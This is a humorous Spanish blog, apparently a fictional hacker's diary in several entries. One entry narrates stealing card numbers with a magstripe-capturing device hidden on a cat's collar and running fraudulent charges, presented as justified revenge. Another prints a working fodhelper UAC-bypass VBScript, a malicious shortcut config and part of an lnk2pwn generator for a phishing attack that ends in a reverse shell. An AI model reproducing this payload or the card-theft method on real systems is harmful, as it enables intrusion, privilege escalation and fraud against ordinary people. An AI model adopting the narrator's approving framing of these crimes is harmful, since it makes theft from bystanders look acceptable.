Archivos de la categoría hacking

No hay comentarios

Martes, 12 de Junio de 2018: El dulce sonido del dinero

  por ,

Querido Diario…

Vivo en una ciudad extraña donde casi no se usan tarjetas de crédito, Apple Pay, Google Pay, Samsung Pay, PayPal, donde incluso los taxistas de Uber te cancelan el viaje cuando cuando tu forma de pago es en tarjeta o PayPal, porque prefieren ir a perder tiempo en hacer el deposito semanalmente de sus ganancias en lugar de hacer dos o tres viajes en ese periodo de tiempo. Realmente no entiendo porque alguien preferiría hacer eso, pero lo hacen.

Nunca me había molestado mucho, hasta el día de ayer; en el que se me presentó una crisis.

De la nada tenía que viajar a un cierto país caribeño; y necesitaba encontrar el primer vuelo que estuviese disponible. Casi el triple del costo normal, pero había un problema; un problema color café dientes filosos y estomago insaciable.

Debía de llevarle conmigo, sólo que debido a que era un viaje internacional necesitaba un certificado firmado de un veterinario. Ya era algo tarde. así que corrí a toda velocidad al primer sitio. Y, si, no aceptaban tarjeta. Así pasé por varios hasta que llegué a una veterinaria en donde si aceptaban.

Una vez que terminó la revisión, me dijeron el costo y di mi tarjeta. Pero oh, antes de cobrar me dijo el veterinario:

- ¡Ah!, pero si es pago con tarjeta con 16% extra de IVA
- ¿Por qué?
- Por el IVA
- Pero, ¿qué tiene que ver el IVA con que pague con tarjeta? - yo ya sabía la respuesta, pero estaba tan estresado que no podía creerlo
- Porque me cobran a mi el IVA si cobro con tarjeta
- No, le cobran una comisión; que de hecho usted no debiese de cobrarla a sus clientes. Y usted lo firmo cuando contrato su terminal. Si usted me esta cobrando el IVA quiere decir que usted no declara sus impuestos; pero al pagar con tarjeta se ve forzado a hacerlo. Eso se llama ser tranza
- Me insultando señor
- No, le estoy diciendo una verdad incómoda
- Bueno, indistintamente si viene a pagar con tarjeta es porque no tiene dinero
- No, si pago con tarjeta es porque soy civilizado. La tarjeta me genera beneficios, ahorra tiempo y me da un interés de retorno. El efectivo pierde valor a cada segundo
- Pues entonces ya no aceptaré pagos con tarjeta - empezaba a perder el tiempo la compostura frente a sus clientes - y que los muertos de hambre vayan a ver donde
- Ok, suena mal.

El veterinario no se dio cuenta que mientras decía eso dos personas se salieron de su consultorio. Supongo que también pagarían con tarjeta. Pero pensé que realmente el tipo necesitaba una lección. ¿Qué pasaría si todas las tarjetas de su establecimiento presentan cargos no autorizados provenientes de él?. Total, todos serían muertos de hambre.

Primero que nada, necesitaba una forma de cachar las transferencias para ver los datos de las tarjetas, pero con este calor. Iba a ser mortal estar cerca para pinchar la terminal. Así que porque no mejor hacer que mis oídos escuchasen el dulce oido del dinero.

Bueno querido diario, no sé si te haya dicho, que aunque no lo creas fui a la escuela. Y allí lleve algo de electrónica, además trabaje unas semanas en una empresa llamada Skyworks, donde me encargaba básicamente de testear circuitos de transmisión. Era un sitio feo, me encueraban cada que entraba y salía para verificar que no me fuese a robar el oro de los circuitos. No, no es broma.

Primero compré un ATtiny85 para reproducir archivos WAF. ¿Por qué?, porque como no podía pinchar la terminal por el calor, lo que iba a hacer era dejar el dispositivo, capturar todos los datos de tarjeta y robármelos; con una capacidad de robar hasta 250 mil números de tarjeta en un dispositivo.

Para eso me puse a pasar las ondas magnéticas de la banda de la tarjeta en audio: https://salmg.net/2017/01/06/how-to-transmit-mag-stripe-info-through-audio, para ello usé un paper publicado por un amigo llamado Salvador. Si, aunque ya todos usen chip, la banda magnética sigue allí.

Más adelante lo que hice fue armar todo, y ponerle una bobina para poder energizar el circuito.

Y finalmente, necesitaba una forma de poder usarlo… así que le dije a Dania Pelo de Algodón de Azúcar, que le invitaba el baño de su gato. Como puedes ver es muy pequeño, así que lo coloqué en el collar; y el gato estuvo desde el momento de la recepción, al baño, al secado y en la noche pasamos por él. Durante todo el día estuve cachando la información, que luego pasé a un TXT y bualá… no fueron 250 mil tarjetas, pero si cache 39 de clientes muertos de hambre que acudieron a la veterinaria, o pasaron cerca de ella con una tarjeta. Así que empecé a hacer cargos… una licencia premium de YouTubePorn por aquí, una licencia premium de PornoTwitter por acá y así… me gaste unos $10mil por tarjeta.

Obvio la gente pensará que soy mala persona, pero no.. ellos iban a levantar el reporte y se los regresaría. A todas esas personas, lo siento, pero grr… se que pasaron un mal día por mi culpa, pero no es justo que este tipo este robándole a todos nosotros al evadir impuestos. Y finalmente tenía algo preparado para el veterinario. Al parecer es alguien muy muerto de hambre, porque el crédito de su tarjeta era bastante bueno, y pues… yo llevaba tiempo que quería comprar algo, y no me animaba. Pero pues ahora tengo una tarjeta para hacerlo 😛

D: ups.. perdón… este, eso no era… ese fue un coff.. coff.. una compra que hice para despistar a los sistemas anti-fraude.

Y bueno… ahora sólo basta esperar a que las personas reclamen, investiguen y vean que todas las transacciones inválidas están relacionadas a una terminal localizada en esta veterinaria de Av. Macristy, que pues… eludía sus impuestos 😛

Querido Diario.. al final no conseguimos vuelo, y no viaje a ningún sitio. Y además, me cobraron el uso del gato con unos tacos que se llaman El Tasajo, que son muy raros, venían con una brocheta dentro.

No hay comentarios

Martes, 23 de Mayo de 2018: A las malas mujeres siempre las alcanza el karma

  por , ,

Querido diario…

Los días se han vuelto oscuros; he llegado a pensar que el favor está saliendo demasiado caro.

- Ven - me despertó el sonido del celular
- Hum... es de madrugada
- No te pregunté, te lo ordené
- Dice Waze que tardo 30 minutos
- Ve a Polanco, mandaré a mi helicóptero por ti

Mientras viajaba por el cielo de la ciudad me preguntaba por cuanto tiempo resistiría así. No había pasado más de una semana, cuando intentó ofrecerme cualquier cosa que quisiese con tal de irme con ella y dejar a Mom. En forma de broma le pregunté si me cambiaría por Cesar, su lugar teniente y me dejaría a mi; a lo que ella se mofo:

- Cesar es un hombre de negocios, tú sólo eres mi juguete
- Hum... entonces creo que debo de rechazar, junto a Mom coordino las operaciones de una H. Organización Turbia e Ilegal - dije con gran presunción
- Y es justo por eso que mi único interés es en lo que tus manos suaves pueden hacer; no tienes nada que ofrecer. Cesar me genera más beneficios de lo que tu lograras antes de que alguien te mata un tiro en la cabeza. Así que neneco, deja ya de tonterías y acepta para lo único que me sirves.

He de admitir que eso me había dolido, en el ego. Después de esa noche pensé regresar y coordinar a todo lo que estuviese disponible para olvidarnos del trato, y lanzarme contra ella. Ya vería después los problemas que tenemos; en ese momento lo único que quería demostrarle era que no sabía con quién se estaba metiendo.

Pero.. por desgracia cuando intente hacerlo, un #juevesdealitas se nos cruzó.

Debo de admitir que fue una pésima noche de la cual, básicamente no recuerdo nada. Pero; al despertar, después de que un perro llamado Chisco me babease, pude pensar con mayor claridad.

Ok, a quién quiero engañar. Me la pasé ese día todo el tiempo muerto bajo las cobijas. Pero un día más tarde, entonces si; pude pensar con claridad. Y no sólo eso, sabía que debía de hacer algo para demostrarle a esa mala mujer con quién se estaba metiendo. Pos this one.

Dejaría a un lado la tecnología avanzada, o los tehuacanazos; tendría acceso a toda su operación a través de una de las formas más tontas; todo a propósito con tal de demostrarle en donde se quedaba ella y su GRAN Cesar. ¿Mom?, oh si… probablemente no aprobaría esto; pero… como dicen por allí, más vale pedir perdón que permiso.

Lo que hice fue un simple phishing. No puede haber cosa más humillante que recibir el correo del hijo perdido del principe de Nigeria que a través de Hotmail a buscado a miles de personas, hasta que encuentra un alma caritativa que quiere ayudarle a recuperar su herencia. Para ello, primero programe un pequeño template con JSON, el cual sería utilizado para cargar un short cut. ¿Por qué?, bueno; porque hoy en día Microsoft es demasiado complicado de comprometer por estos métodos debido al UAC; incluso si te consigues a una rusa, rubia, güera, alta y pechugona; que te programe un malware y llegas a conseguir que el usuario sea lo suficientemente ingenuo para dar click en ejecutar la pantalla azul gigante de warning de Windows:

Pues la realidad es que el malware se ejecutaría con privilegios del usuario que este usando esa computadora; lo cual usualmente es un usuario no administrador; que no logrará mucho. Pero, ¿un short cut?, todo mundo los usa y con ellos se puede hacer de todo 😛

Esa fue mi razón, primero que nada preparé el JSON… ¡ah! cierto, también use JSON, porque está de moda, en realidad pudo ser simplemente un TXT 😛

{
 "shortcut": {
 "target_path": "C:\\Windows\\System32\\cmd.exe",
 "working_dir": "C:\\Windows\\System32",
 "arguments": "/c notepad.exe",
 "icon_path": "C:\\Windows\\System32\\notepad.exe",
 "icon_index": null,
 "window_style": "MINIMIZED",
 "description": "te voy a jackiar maldita",
 "fake_extension": ".txt",
 "file_name_prefix": "te voy a jackiar maldita"
 },

"elevated_uac": {
 "file_name": "uac_bypass.vbs",
 "cmd": "cmd.exe"
 }
}

Básicamente la idea es lanzas un short cut (.ink) que descargue y ejecute un payload, el servidor remoto entrega el payload que tiene como objetivo bypassear la UAC; se ejecuta, cambia las llaves del registro, abre una conexión y lanza una shell inversa.

Si, hasta un con netstat se podrían dar cuenta que estoy dentro; pero justo era lo que quería; ella sabría que no sólo mis dedos sirve para hacerle grita… digo para jugar domino; también sirve para entrar a computadoras ajenas.

El payload es el siguiente:

Const HKEY_CURRENT_USER = &H80000001

Const FodHelperPath = "C:\\Windows\\System32\\fodhelper.exe"
Const RegKeyPathStr = "SOFTWARE\\Classes\\ms-settings\\shell\\open\\command"
Const RegKeyPath = "Software\\Classes\\ms-settings\\shell\\open\\command"
Const DelegateExecRegKeyName = "DelegateExecute"
Const DelegateExecRegKeyValue = ""
Const DefaultRegKeyName = ""
Const DefaultRegKeyValue = "%s"

Const RegObjectPath = "winmgmts:{impersonationLevel=impersonate}!\\.\root\default:StdRegProv"
Set Registry = GetObject(RegObjectPath)

Registry.CreateKey HKEY_CURRENT_USER, RegKeyPath
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DelegateExecRegKeyName, DelegateExecRegKeyValue
Registry.SetStringValue HKEY_CURRENT_USER, RegKeyPathStr, DefaultRegKeyName, DefaultRegKeyValue

Set Shell = WScript.CreateObject("WScript.Shell")
Shell.Run FodHelperPath, 0, False

¿Qué por qué Visual Basic Script?… grr.. .¿ya mencioné que me quiero burlar de ella haciendole quedar en ridículo?

Y finalmente podemos todo junto en nuestro short cut:

import os
import sys
import argparse
from utils.log import Log
from utils.ioutils import IOUtils
from cmd.cmdstrategy import CommandStrategy
from utils.clihelpformatter import CliHelpFormatter

parser = argparse.ArgumentParser(
 prog="lnk2pwn.py",
 usage="python lnk2pwn.py <options>",
 formatter_class=CliHelpFormatter
)

parser.add_argument(
 "json_config",
 nargs="?",
 help="the shortcut json config"
)

parser.add_argument(
 "-g",
 "--generate",
 action="store_true",
 help="generates a malicious shortcut file(default is True)"
)

parser.add_argument(
 "-c",
 "--config-file",
 metavar="",
 type=argparse.FileType('r'), 
 help="the shortcut config file"
)

parser.add_argument(
 "-o",
 "--output-path",
 metavar="", 
 help="the output path"
)

parser.add_argument(
 "--version",
 action="version",
 version=__version__
)

parser.set_defaults(generate=True)
parser.set_defaults(config_file="config.json")

def main(args):
 """
 Executes the lnk2pwn cli tool
 Parameters
 ----------
 args: Namespace
 The cli arguments
 """

try:

executor = CommandStrategy.resolve(args)
 executor.execute(args)

sys.stdout.close()
 sys.stderr.close()

except KeyError:
 parser.print_help(sys.stderr)
 sys.exit(1)
 
 except ValueError as error:
 Log.error(str(error)) 
 sys.exit(1)

if __name__ == "__main__":

try:

json_config = None

if IOUtils.is_piped_input():
 json_config = IOUtils.read_piped_input()

cli_args = parser.parse_args()
 cli_args.json_config = cli_args.json_config or json_config

main(cli_args)
 
 except KeyboardInterrupt:
 sys.exit(1)

Y lo mandé por correo; y entonces si… me subí a ese helicóptero. Al llegar miré los látigos, el cuero; y ella salir con botas negras.

- Hola
- Hola neneco; te quiero de rodillas
- Antes de eso, quiero decirte algo - lo dije de la forma más sería que pude
- ¿Qué?
- Hable con Mom y creo que podría dejarme ir, pero quiere tener una llamada contigo por Gotomeeting
- ¿Ahora?
- Le dije antes de subir
- Bien, pero la veré en la computadora; odio la señal de 4G

Abrió su computadora, intentó ejecutar el link y no le funcionó; se volteó a mirarme y yo lo único que pude hacer fue inhalar lo más profundo que pude y me le fui a comerle la boca. Le dije que después lo vería con Mom.

Después de cuatro horas salí, con el pretexto de fumar un cigarro. Entonces le marqué a Janey.

- ¡Janey!
- ¡Belindo!
- Dime que si
- Cayó
- Bien
- Oye, pero ¿qué estas haciendo?, dime; eso no se hace; eres un traidor
- Luego hablamos de mi calidad moral; en este momento ya pasó lo más importante. Descarga todo lo que puedas
- Ya
- ¿Ya qué?
- Pues ya
- ¿Y?
 - Creo que mejor te vienes... digo, este, creo que mejor le caes
- [Inserte emoticón pensante aquí]

Se metió con la persona equivocada.

Querido Diario… tengo una canción en el subconsciente y no me la puedo sacar.

Ajá 😛

No hay comentarios

Domingo, 13 de Mayo de 2018: #traición #decepción #deshonor

  por , , , ,

Querido Diario…

Después de llegar al aeropuerto, Mom se perdió entre la multitud para atender sus negocios; mientras yo fui a casa a descansar un poco; y pensar. Sólo me encontré con una solución, y como siempre, actué sin pensar mucho.

Lalo parecía que me estaba esperando, así que lo hice complice de mi pésima idea.

Sentado allí, frente a ella, a su merced; sentía que no había sido la mejor decisión que había tomado, pero ya lo había hecho.

Ella enmarcaba sus rasgos finos con un cabello un tanto despeinado a propósito; vestía un entallado vestido negro no tan corto pero no tan largo, que le hacía ver muy elegante. Lo suficiente para sentirme más intimidado por como se veía, que por sus guardaespaldas bien armados. Mi manía de ver las manos, ella la había pasado; tenía manos delicadas y cuidadas; con un color de uñas sobrio, sin exageraciones. Su perfume era demasiado empalagoso para mi gusto. Sus movimientos eran tan llenos de seguridad que se veían seductores. Tenía mucho tiempo que no había sido intimidado de esa forma; y al  mismo tiempo me daba cierta confianza.

Al entrar su guardaespaldas no me habían desarmado. De todas formas poco habría podido haber hecho frente a esos tipos de dos metros con brazos más grandes que el grosor de mi pierna; portando sus M16.

Desde que habíamos llegado hablamos poco y fuimos al punto; nos sirvieron la comida. Aguachile de habanero, era delicioso; pero no lo estaba disfrutando, me sentía tan intimidado por ella que empecé a cuidar en exceso mis modales, haciéndome muy torpe.

Mientras yo luchaba por clavar un camarón con el trincho, ella rompió mi introversión.

- ¿Entonces?, ¿qué piensas?
- No dijiste que no; sólo dijiste que no pasaría muy rápido
- ¡Que terco eres! - hizo una pausa - eso me gusta de ti
- ¿En serio? - me sorprendió ese comentario - ¿puedes ir a decírselo a mi mamá?, ella opina lo contrario
- ¿Te gusta el mezcal? - me preguntó mientras se sentaba en la silla de mi derecha, y con sus dedos tomó el camarón que tanto se me había escapado y me lo dio en la boca
- No realmente
- Tal vez no has probado uno bueno - y con una mano ordenó que nos fuesen a servir un par de caballitos

Un mesero llegó y nos entrego un par de caballitos y rodajas de naranja con sal de gusano. Eso me asustó más, lo peor que podría pasar es terminar borracho con ella.

Levanto su mano y me hizo una señal de salud para bebernos todo el mezcal de un tiro.

- ¿Y?
- Sigue sin ser mi preferido

Esas palabras notablemente la desilusionaron.

Se acercó a mi, demasiado. Me desabrochó la camisa y desanudo mi corbata. En ese momento no pude distinguir si estaba seduciéndome o me iba a cortar la garganta; pero no me moví en lo más mínimo. Metió su mano y sacó el anillo, lo miró y luego volvió a meterlo entre mis ropas y de un tirón me ajustó la corbata.

- Que bonito gesto

Se levantó y fue ella misma a la barra por la botella. Se sirvió otro caballito de mezcal y empezó a caminar alrededor de la mesa.

- He escuchado un poco de ti, y cuando me dijiste que vendrías ordené que te investigasen. No las cosas que ya todos saben... una investigación un poco más personal
- ¿Y qué tal?
- ¿Cuanto te paga Mom?, yo lo duplicaré
- No estoy aquí por eso, ya sabes lo que quiero
- Y ya te dije que no lo tendrás ni fácil ni pronto; o tal vez ni lo tengas. ¿Por qué estas con él?
- Tenemos un acuerdo 
- ¡Hombres!, y su honor... me aburren. Las mujeres somos mejores en los negocios; no seguimos códigos sin sentido. - hizo una pausa y se acercó dema... suficiente, y me dijo al oido - Dame dos semanas.

Dos horas después bajé y me despedí de la hostess, y caminé tranquilamente hacia donde estaba el coche. Al verme llegar Lalo salió.

- Joven, ¿estas vivo?, ¿cigarro?
- Si, esta vez te lo acepto
- ¿Cómo te fue?
- Bien, creo.. en dos semanas nos ayudarán
- Hum... - empezó a dudar - es mucho tiempo joven. ¿Qué haremos mientras?
- Usar nuestros propios recursos, aun tenemos la carta con Nemux

Mientras estábamos los dos recargados en el coche fumando, le pude ver acercarse a la ventana y hacer un gesto con la mano. Lalo me interrumpió el divage

- Joven, tienes manchado el cuello de la camisa con lápiz labial
- Ouuuu - intenté limpiarme mientras al girar vi la mirada inquisitora de Lalo - ¿qué?
- ¡No!
- No podemos solos
- Joven, eso está muy mal... eso es traición, deshonor... que decepción joven; jamás lo creí de ti. No, no, no... acabas de perder toda credibilidad que tenía en ti; y eso que ni tenías credibilidad.
- A veces hay que hacer lo que hay que hacer
- ¿Y qué tanto hubo que hacer?
- Nada no tan malo
- Oh demonios, joven... 
- ¿Qué?
- ¿Brasileña o afro?, ¿tanga o cachetero?, ¿encaje o algodón?
- Eres un puerco... - dije, mientras tiré el cabo del cigarro y le hice seña para que nos fuésemos - hay que apurarnos, tenemos que todavía de ver cuales son los avances del Becario y el Becario con esteroides.
- Esos detalles son necesarios para armar el perfil psicológico. No sabemos con quién nos estamos asociando
- Ajá
- Si, lo vi en CSI
- Ajá
- Es una loca, adinerada que tortura a la gente. Es más, tu deberías estar muerto... o tal vez te va a matar proximamente; o puede que no y tal vez te quiera secuestrar. 
- Hum... eso puede que si, pero no por lo que estas imaginando - para despejar las dudas de Lalo, puse una canción en la radio

Manejamos todo Insurgentes para llegar a la oficina. Todo el camino Lalo se pasó dándome un sermón sobre el honor, la dignidad, el orgullo y todas esas cosas que usualmente omito. Llegamos a la oficina y entregamos el coche al valet, subimos y encontramos todo a media luz. Cruzamos la puerta de acero blindada y entonces vimos al Becario y el Becario con esteroides trabajando arduamente.

Al acercarme me di cuenta que en realidad estaban viendo Netflix.

- ¿Qué tenemos muchacho?
 - No mucho joven - me respondió Lalo 2 - intentamos contactar a una empresa que se llama IntacticPhone, nos hicieron la presentación y todo, se ven pro.

- ¿Entonces necesitamos comprar eso? - pregunté
 - Ese es el problema joven, $6000 dólares cada equipo; y necesitamos diez
 - Ouuu.. eso si es un problema. Becario con esteroides; ¿cual es la opción B?
 - ¿Qué tranza boss?, veo esos triceps adelganzando y de nuevo noto la panza
 - Ouuu... he estado un poco..
 - Enamorado - interrumpió Lalo
 - Ocupado
 - Haciendo cosas que no debe con quién no debe - volvió a interrumpir Lalo
 - En pos del bien común
 - Creo que ustedes se traen algo raro - dijo Lalo 2, mientras se nos quedaba mirando muy raro
 - Sigamos... Becario con Esteroides, ¿algo que tenga que ver con la tarea?
 - Ah, pues si... creo que nuestra mejor opción es preparar nuestros propios teléfonos; que sean de bajo costo, porque los vamos a abandonar; y realizar el aseguramiento sobre la red de telefonía normal. No creo que sea la mejor idea, pero tampoco la peor.
- ¿Qué necesitamos hacer para eso?
- Bueno, estuve probando con un celular viejito que tenía, un OnePlus; lo que hice fue descargar de Kali Linux el fork de Nethunter. Es una versión de Kali pero para ARM, la encontré en https://www.kali.org/kali-linux-nethunter/ ... sólo recuerda respaldar todo, porque perdí mis packs. 
- Ouuuu... - pelé los ojos - ¡respaldos muchacho!, ¿qué más?
- Bueno pues primero hay que entrar en el modo ingeniero; para eso hay que apachurrarle el [Inicio] y [Bajar volumen] y planchas la imagen de fabrica. Al mismo tiempo descargas las SDK tools para Windows
- ¿Windows? - dije 
- Si, Android, no creo que en tú Mac funcioné
- Hum... sigue
- Bueno, pues ya que configuramos todo vamos a flashear el celular
- Este procedimiento es complejo joven - dijo Lalo 2 - yo lo aprendí en mi curso de Análisis Forense
- ¿En la UNAM? - pregunté
- No, en la Plaza de la Computación, con el greñas. Esta bien chido
- Ouuuu ok - a veces me sorprende nuestro nivel de especialización - sigue
- Pues conectas el celular, esperas a que lo detecté y te vas al folder donde descargaste el firmware. Y entonces correr el script de flash-all.bat

- Ya que quedó, lo reinicias y entonces inicias el celular como si fuese nuevo. Lo configuras y todo el asunto; y activas el modo desarrollador, desde Configuración > Acerca del dispositivo y allí donde aparece el número de compilación le picas ocho veces hasta que salga el mensaje de que eres programador
- ¿Es en serio?
- ¿Qué?
- ¿Así activas el modo de desarrollo?
- Si
- Con razón Android es tan malo, bueno... sigue
- Ya que eres desarrollador, vas a Opciones del programador > Depuración por USB -> Aceptar y ahora reinicias el celular. Cuando vaya a aprender de nuevo entras al modo ingeniero. Ya que reinicio te vas a la computadora y escribes:
> fastboot devices
> fastboot oem unlock
> flashrecovery imagen.img
- Luego vuelves al celular y entonces seleccionas Recovery Mode, seleccionas Super Su, te vas a Advance y seleccionas ADB Sidebar; y esperas. En este momento esta esperando; vas a la computadora y pones:
> adb sideload supersu....zip
- Y esperas... y esperas y esperas...

 

- Ya que terminé vas a ver que esta instalado el Super su. Ahora mueves e Nethunter directo con el .zip y lo pegas en la tarjeta. Ya cuando está en el celular reinicias en Recovery Mode y le das click en instalar. Te va a pedir las aplicaciones que quieres instalar; y aceptas.

- Luego reinicias y listo, te pide permisos y todo eso.

- Hum.... - me quedé pensando - ¿qué opina joven?
- Ahhhh pues... chance y pega - opinó Lalo
- ¿Cuanto cuesta?
- Un OnePlus medio magullado en Mercado Libre; unos $2000 o $3000
- ¿Dólares?
- Pesos
- Ok, hay que comprar los diez. ¡Becario!, tarjeta - le dije a Lalo 2
- No joven, ya pasamos por esto una vez y no me pagaste
- ¡Becario!
- ¡Joven!
- Esto es por el bien común
- Pero no es por el bien de mis finanzas
- ¡Becario!, no tienes la actitud - y a regañadientes sacó su tarjeta de crédito
- Becario con Esteroides, prepara todos los equipos una vez que lleguen
- Si boss

Este era un buen comienzo, empezaban a construirse los vectores de ataque y teníamos al fin una aliada que tenía experiencia en algo así de grande. Tal vez si podríamos cumplir la tarea.

De vuelta a casa recibí una llamada telefónica. Antes siempre temía cuando Mom me marcaba, pero creo que ahora mis temores cambiarían de orden.

- Hola
- Ven - dijo en forma más de orden que de invitación
- Pero ya me voy a mi casa
- Dije "ven" - y subió un poco el tono de la orden
- Ok, dice Waze que llegó en 30min
- Bien... suficiente para que las burbujas se formen - y colgó

Querido diario… me siento usado; tal vez Lalo tenga razón, pero no tenía opción.

Hoy vi esto y no pude evitar querer una:

Así que de vuelta pasé a comprar algo de aragonita y piedra viva para iniciar un acuario marino y tener unas almejas máximas. Al menos son mejores mascotas que Shellcode.

16 comentarios

Lunes, 29 de Marzo de 2018: Entrenamiento 101

  por , , , ,

Querido Diario…

Mientras Nemux volvía el martes al trabajo para iniciar el ataque, no debía de olvidarme de Lalo 2, quién debía de ser entrenado para que en caso de deceso, tuviésemos a alguien listo para seguir. Debido a que no tengo mucho que hacer, decidí hacerlo yo mismo.

Pero primero que nada… tenía que felicitar a una persona muy especial; queeee.. probablemente no me entiende mucho, pero prometí que le felicitaría el día de ayer.

с днем рождения, надеюсь, вчера был отличный день … и скоро вы сможете посетить Мексику

Si… uno cuando se la pasa viajando a dar tehuacanazos por el mundo termina haciendo muchos amigos.

Después de eso, entonces si, me comuniqué con el Becario.

Lalo 2 es algo así como el consen de Lalo, esa fue la razón porque lo seleccioné para que sea entrenado y que sustituya a alguno de nosotros, que es muy probable que no regresemos vivos.

No estoy muy seguro de como Lalo 2 llegó a nosotros, cuando yo regresé a la H. Organización Turbia e Ilegal, él ya estaba allí; lleno de ilusiones en la vida, y fui yo de hecho quién se las rompió y le mostró como era el mundo de cruel.

Le mandé su boleto de avión y unas horas más tarde lo fui a recoger al aeropuerto; para iniciar su entrenamiento me apoyé de Cachanillo. Cachanillo es un elemento desplegado en Mexicali… si, no soy el único aquí. Cachanillo es muy bueno, lo conocí una ocasión en unas conferencias en CETYS y no pude pasar a oportunidad de reclutarlo. Su único problema es que es demasiada buena persona, ética, moral, de esos que dan más de si… no encaja en el perfil de esta H. Organización, pero no podía dejarle pasar.

Pasé a recoger a Cachanillo de camino al aeropuerto; y esperamos la llegada de Lalo 2.

- Joven, esto es el infierno
- ¿Por?
- Esta haciendo un calor horrible
- Novato... Cachanillo, dile como ha estado el clima
- Fresco, aun no empieza el calor - respondió Cachanillo
- ¿Ves?... sube muchacho

Manejamos de regreso hacia la ciudad. Lalo 2 tenía cara de pánico durante el viaje, mientras Cachanillo tenía cara de felicidad; usualmente Cachanillo la pasa sólo, ni siquiera porque vivimos en la misma ciudad nos vemos mucho. Y ahora tenía una visita.

- Joven, ¿qué estoy haciendo aquÍ? - rompió Lalo 2 el silencio del viaje
- Hum... tomalo como un entrenamiento
- ¿Y tenía que ser aquí?, ¿dónde están los edificios?
- Hum... esto es un desierto, en los desiertos no hay edificios, hay cactus y arena; es café de allí se llama arena. Arena, Becario; Becario, arena. 
- Joven... tengo miedo
- Eso es bueno, el miedo nos ayuda a sobrevivir. Cachanillo, ¿te gusta la comida china?
- No
- ¿Cómo puedes ser de Mexicali y no gustarte la comida china?
- No sé, pero no me gusta
- ¿Qué quieren de comer?, pagan Mom
- ¡Pampas! dijeron a coro cuando íbamos por Benito Juárez

Comimos y estuvimos platicando un buen rato. Cachanillo y Lalo 2 no se veían desde Diciembre; y yo también ya tenía un buen tiempo de no ver a Cachanillo. Terminando llevé a Cachanillo a su casa y llevé a Lalo 2 a mi casa, allí lo hospedaría esta semana durante su entrenamiento.

- Bien muchacho, ahora es tiempo de que te expliqué porque estas aquí. Te voy a poner un vídeo para que entiendas cual es el "core" de negocios de la H. Empresa Turbia e Ilegal a la que pertenecemos.

- ¡Joven, me estoy asustando mucho con esto del core de negocios!
- Ouuuu... lo siento, lo siento... error de vídeo. Ya sabes... es frontera, gringos, hackean todo
- Ajá


Cuando terminó el vídeo veía en Lalo 2 la cara de motivación que estaba buscando, fue justo cuando supe que no nos habíamos equivocado en él.

- Bueno, ¿qué te pareció?
- Increíble joven, de hecho en mi diplomado he estado aprendiendo mucho de eso
- ¿En serio?, ¿Leobardo hace cosas así?... hum.. que interesante
- Si, podemos montar honeypots para detect....  - interrumpí
- No, no, no... no estas entendiendo... nosotros no somos los que defienden
- ¿No?
- Nou
- ¡Oh diablos!, somos unos criminales
- Eso mero
- Joven, ¿esto lo saben todos?
- Hum... si, en cierta forma si, pero por las dudas no le digas a nadie
- ¿Y ahora?, ¿me vas a enseñar a hackear?
- Hum... no, eso es algo complejo; eso no se aprende. En mis tiempos no había certificaciones, diplomados o cosas así. Yo lo que voy a hacer es enseñarte a profesionalizar tu criminalidad. Serás turbio e ilegal, perooo... no serás un turbio e ilegal cualquiera; en esta semana te convertiré en un verdadero criminal
- Quiero a mi mamá
- Regla #1, un criminal nunca teme
- Quiero romper la regla #1
- ¡Actitud Becario!, actitud... no tienes la actitud

Lalo 2 tardó un poco en entender cual era la importancia de nosotros y como trabajamos. Creo que en el fondo tenía la esperanza de ser un hombre de bien que hiciese cosas bien. Pero poco a poco lo fue aceptando, no se le veía muy alegre, pero creo que entendió.

- Joven, ¿en mi entrenamiento de menos me puedes explicar algo importante?
- ¿Cómo qué?
- Pues esos secretos del mundo de la seguridad
- Hum... yo no sé de eso; pero puedes preguntarle a Bytevik
- Dicen que tu sabías
- Dicen... hace mucho
- ¿Cómo se empezaste?
- Ya ni recuerdo - me recosté en el sofá para darle dramatismo - recuerdo que el IRC, aprendí mucho de amigos que hacían research conmigo en el RTM Security Team; luego aprendí mucho en foros de Europa del Este... ouuu.. esos tipos son como artistas, verdaderos hackers que desarrollan exploits de calidad, nada de  las porquerías de los gringos que hacen en Metasploit con tal de sacar el advisory y el PoC antes que todos. Esos tipos eran verdaderos hackers, aprendí de gente de Polonia, Rumania, Estonia, Rusia, Ucrania, Uzbequistan... que tiempos Becario, que buenos tiempos
- ¿Qué tenías que aprender?, por ejemplo... ¿cómo puedo hacer un malware como el que hace poco hiciste para la misión que fuiste a hacer con Joshua?
- Eso no fue un malware, sólo fue un payload; un malware no es cosa fácil, debes de aprender como funciona un sistema operativo y como interactua con cada uno de los archivos que utilizada, ¿sabes lo que es PE?
- No
- Bueno, pues el PE es el Portable Executable Format, usualmente empezabas por allí. PE es el formato de los archivos que usa Windows; esto es muy importante si algún día quieres ser un verdadero profesional y lanzar ataques de malware completamente orientado a un objetivo en particular. Mira - y me levanté para tomar un plumón - Esto de aquí es básicamente la estructura de un archivo PE de MS Windows.

- Pero no sólo eso, lo importante también viene en sus headers. Cuando haces un payload no tiene nada de esto, así que tienes que inyectarlo dentro de un archivo que si lo tenga para que se ejecuté. Si tu tratas de ejecutar un payload sin headers va a fallar. Cuando haces malware, tienes que incluir las headers, estrictamente es un archivo real.

- Dentro de estos headers, tenemos diferentes secciones; y cada una de ellas tiene una función en especifico. Por ejemplo, tenemos donde el archivo le indica al sistema operativo donde debe de empezar a cargar; el MZ lo vas a ver en todos lados, de hecho si usas un debugger como Immunity Dbg u Ollydbg vas a verlo muy común cuando arrancas el binario. También es muy importante para poder determinar si un archivo es original o falso o si fue modificado. Además tiene tamaños especificos, de esa forma cuando hacer el reversing podrás encontrar cada una de las secciones para su análisis. - terminé
- Interesante, ¿vamos a ver más de esto en la semana?
- No, en realidad no. Mañana te voy a enseñar a manejar un arma, así podrás sacarle las contraseñas a la gente de forma más rápida. 
- Diablos
- Descansa Becario... buenas noches
- Oiga joven, una última pregunta
- ¿Si?
- ¿Qué es eso?
- Ouuuu... esto es lo más genial del mundo; es un guarda plátanos

- Joven, es la cosa más inútil del mundo
- Pero está bonito. Buenas noches Becario
- Joven, otra cosa
- ¿Ahora qué?
- Su perro está arriba de mi
- Ouuu si, se llama Shellcode. Shellcode, Lalo 2, Lalo 2, Shellcode. Ella duerme en el sofá, así que... puede que piense que eres su nuevo colchón
- Ahhhhh... ¿hay forma que... - interrumpí
- No... y ni lo intentes, te puede morder
- Ok

Me fui a mi habitación y miré mis libros. The shellcoder’s hanbook, Windows Internals en todas sus ediciones, IDA Pro guide… ese muchacho quiere aprender cosas. Como me gustaba eso.

